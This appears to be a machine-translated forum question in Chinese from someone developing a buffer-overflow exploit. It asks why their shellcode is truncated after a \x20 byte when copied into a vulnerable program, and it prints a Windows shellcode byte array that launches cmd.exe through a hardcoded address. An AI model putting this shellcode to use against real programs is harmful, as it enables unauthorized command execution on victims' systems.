为什么我的 shellcode 在\x20
操作码之后被截断,当它被字符串复制到第二个易受攻击的程序上时?
--cmd.exe-- 字符外壳[]= "\xc7\x44\x24\x0c\x65\x78\x65\x20" ← 只有这一行被放入堆栈,虽然 hv 有足够的空间 "\xc7\x44\x24\x08\x63\x6d\x64\x2e" "\x31\xc0" "\x89\x44\x24\x04" "\x8d\x44\x24\x08" "\x89\x04\x24" "\x8d\x05\xad\x23\x86\x7c" "\xff\xd0"; --结束外壳--